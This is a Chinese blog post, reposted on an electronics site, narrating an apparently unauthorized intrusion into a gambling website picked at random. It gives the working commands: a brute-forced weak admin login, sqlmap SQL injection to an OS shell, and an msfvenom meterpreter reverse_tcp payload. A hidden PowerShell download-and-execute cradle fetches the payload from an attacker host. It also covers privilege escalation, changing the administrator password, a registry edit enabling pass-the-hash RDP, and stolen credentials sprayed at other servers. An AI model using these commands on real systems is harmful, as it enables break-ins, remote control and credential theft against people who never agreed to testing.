0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

某菠菜的滲透測試操作筆記

jf_hKIAo4na ? 來源:xz.aliyun ? 2024-01-04 15:54 ? 次閱讀

前言

閑著無聊,網(wǎng)上隨便找了一個菠菜進行簡單測試,并做筆記記錄,大佬們輕噴,有什么不足之處請指教。

弱口令

訪問網(wǎng)站就是一個登錄頁面,沒有驗證碼直接bp開啟,成功爆出弱口令admin/123456,直接進入后臺。

7302f86c-a062-11ee-8b88-92fbcf53809c.png

sql注入獲取權(quán)限

翻看了很多功能點,在一處功能點發(fā)現(xiàn)上傳接口,并嘗試上傳文件,發(fā)現(xiàn)無法上傳,加了白名單。直接選擇放棄,繼續(xù)尋找。在某一個/GroupMember.aspx?gid=參數(shù)上加上單引號,直接報錯,SQL注入這不就來了么。

73161bc2-a062-11ee-8b88-92fbcf53809c.png

說干就干,直接SQLMAP

73318f38-a062-11ee-8b88-92fbcf53809c.png

發(fā)現(xiàn)為MSSQL,且DBA權(quán)限,直接--os-shell

734610ca-a062-11ee-8b88-92fbcf53809c.png

上線msf

已經(jīng)獲取普通權(quán)限,接下來就是上線msf提權(quán)。msf生成powershell腳本,并放置在網(wǎng)站目錄下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

73532ea4-a062-11ee-8b88-92fbcf53809c.png

Vps開啟監(jiān)聽

7359dc90-a062-11ee-8b88-92fbcf53809c.png

使用powershell上線session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

7361674e-a062-11ee-8b88-92fbcf53809c.png

如果想要通過url拼接堆疊執(zhí)行powershell會存在一個問題,就是單引號閉合問題。我們可以通過對powershell進行編碼一下,這樣就可以繞過單引號的問題。下面推薦一個不錯的網(wǎng)站。

https://r0yanx.com/tools/java_exec_encode/

提權(quán)

session已經(jīng)上線,接下來目標(biāo)就是獲取system權(quán)限。很幸運直接getsystem可以獲取system權(quán)限。如果需要提權(quán)推薦土豆家族提權(quán),實戰(zhàn)中成功率很高,影響的服務(wù)器版本也很多。

73668378-a062-11ee-8b88-92fbcf53809c.png

遷移一下進程,防止進程掉線。

73861e72-a062-11ee-8b88-92fbcf53809c.png

遠程登錄服務(wù)器

發(fā)現(xiàn)服務(wù)器開啟3389端口,因為是system權(quán)限,且為2012系統(tǒng),大于2008版本都是無法抓到明文密碼,直接修改adminnistrator密碼。(實戰(zhàn)中不推薦直接修改管理員密碼)

739ff342-a062-11ee-8b88-92fbcf53809c.png

73b4aff8-a062-11ee-8b88-92fbcf53809c.png

利用hash遠程登錄管理員賬號

因為是win2012無法獲取明文密碼,直接修改管理員密碼稍有些不妥。嘗試通過獲取管理員NTLM遠程登錄機器。(并非同一臺,這只是提供一個思路)

73b9c024-a062-11ee-8b88-92fbcf53809c.png

使用hash遠程登錄RDP,需要開啟"Restricted Admin Mode"

// 開啟Restricted Admin mode
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f


// 查看是否已開啟,0x0則表示開啟
REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"

73be3938-a062-11ee-8b88-92fbcf53809c.png

成功利用hash遠程管理員桌面

73c3bb06-a062-11ee-8b88-92fbcf53809c.png

73c7ec9e-a062-11ee-8b88-92fbcf53809c.png

其他

前期發(fā)現(xiàn)1433端口開放著,尋找數(shù)據(jù)庫配置文件,登錄數(shù)據(jù)庫。

73d9a8bc-a062-11ee-8b88-92fbcf53809c.png

通過fofa找了一下,資產(chǎn)還是挺多的,且很多都開放1433端口,猜測會存在同一個人部署的網(wǎng)站,嘗試用獲取的密碼對這些資產(chǎn)的1433端口進行爆破,成功撞到幾臺數(shù)據(jù)庫,且都是sa權(quán)限。結(jié)束。

73f24818-a062-11ee-8b88-92fbcf53809c.png

審核編輯:黃飛

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    12

    文章

    9160

    瀏覽量

    85421
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    764

    瀏覽量

    44130
  • 端口
    +關(guān)注

    關(guān)注

    4

    文章

    964

    瀏覽量

    32079

原文標(biāo)題:對某菠菜的滲透測試筆記

文章出處:【微信號:菜鳥學(xué)安全,微信公眾號:菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    web滲透測試流程

      滲透測試是什么?網(wǎng)絡(luò)安全學(xué)習(xí)中,web滲透測試流程是怎樣的?后滲透的詳細步驟解析如何?  滲透
    發(fā)表于 01-29 17:27

    有色Petri網(wǎng)在滲透測試中的應(yīng)用

    滲透測試是常用的網(wǎng)絡(luò)安全保障方法。該文細化現(xiàn)有滲透測試過程,針對傳統(tǒng)滲透測試模型存在的不足提出一
    發(fā)表于 04-02 09:45 ?10次下載

    cad簡單操作

    cad實用操作筆記
    發(fā)表于 12-23 02:15 ?5次下載

    DXP 2004簡單操作

    DXP 2004實用操作筆記
    發(fā)表于 12-23 02:15 ?0次下載

    滲透測試工具開發(fā)

    滲透測試工具開發(fā)
    發(fā)表于 09-07 10:30 ?18次下載
    <b class='flag-5'>滲透</b><b class='flag-5'>測試</b>工具開發(fā)

    如何自己制作一個超聲波測距模塊詳細制作筆記資料免費下載

    本文檔的主要內(nèi)容詳細介紹的是如何自己制作一個超聲波測距模塊詳細制作筆記資料免費下載。
    發(fā)表于 05-29 17:56 ?9次下載
    如何自己制作一個超聲波測距模塊詳細制<b class='flag-5'>作筆記</b>資料免費下載

    如何使用低消耗設(shè)備進行破解和滲透測試的Deck操作模式資料說明

    的靈活性。操作員可以攜帶多個相同的Deck設(shè)備到達滲透測試地點,現(xiàn)場酌情選擇合適的電源或其他選項(比如無線網(wǎng)卡、802.15.4貓等)。而不需要按照滲透
    發(fā)表于 05-09 18:15 ?0次下載

    嵌入式C語言的5個位操作筆記資料說明

    本文檔的主要內(nèi)容詳細介紹的是嵌入式C語言的5個位操作筆記資料說明。
    發(fā)表于 05-08 18:19 ?3次下載
    嵌入式C語言的5個位<b class='flag-5'>操作筆記</b>資料說明

    菠菜為燃料電池供電!大力水手成真!

    大力水手吃菠菜給自己補充能量的畫面,應(yīng)該是每一個愛吃菠菜的小朋友的英雄。 不過,菠菜的能量可不止在動畫片里,最近,菠菜真的能為燃料電池供電了! 這也令研究人員感到驚訝,美國
    的頭像 發(fā)表于 10-23 16:00 ?1802次閱讀

    基于STM32四軸飛控制作筆記

    這里寫自定義目錄標(biāo)題基于STM32四軸飛控制作筆記新的改變功能快捷鍵合理的創(chuàng)建標(biāo)題,有助于目錄的生成如何改變文本的樣式插入鏈接與圖片如何插入一段漂亮的代碼片生成一個適合你的列表創(chuàng)建一個表格設(shè)定內(nèi)容
    發(fā)表于 11-30 16:36 ?11次下載
    基于STM32四軸飛控制<b class='flag-5'>作筆記</b>

    白盒滲透測試的優(yōu)勢是什么

    滲透測試是一項重要的進攻性安全演習(xí)或操作。如果執(zhí)行得當(dāng),它會極大地提高您組織的安全性。滲透測試分為三種類型,根據(jù)
    的頭像 發(fā)表于 09-19 10:04 ?1227次閱讀

    使用超聲波傳感器制作筆記本電腦觸摸板HCSR 04

    電子發(fā)燒友網(wǎng)站提供《使用超聲波傳感器制作筆記本電腦觸摸板HCSR 04.zip》資料免費下載
    發(fā)表于 10-31 09:58 ?0次下載
    使用超聲波傳感器制<b class='flag-5'>作筆記</b>本電腦觸摸板HCSR 04

    滲透測試和邊緣

    滲透測試和邊緣
    的頭像 發(fā)表于 01-03 09:45 ?609次閱讀
    <b class='flag-5'>滲透</b><b class='flag-5'>測試</b>和邊緣

    11款專家級滲透測試工具

    回顧過去,黑客入侵異常困難,需要大量手動操作。然而,如今,一整套自動化測試工具讓黑客變成了“半機械人”,能夠比以往任何時候都進行更多的測試。以下11款專家級滲透
    的頭像 發(fā)表于 03-07 10:51 ?3382次閱讀

    如何使用DudeSuite進行滲透測試工作

    Dude Suite 是一款集成化的Web滲透測試工具集,包含了Web滲透測試活動中使用頻率非常高的功能,可以幫助我們高效地完成對Web應(yīng)用程序的
    的頭像 發(fā)表于 06-13 09:04 ?1634次閱讀
    如何使用DudeSuite進行<b class='flag-5'>滲透</b><b class='flag-5'>測試</b>工作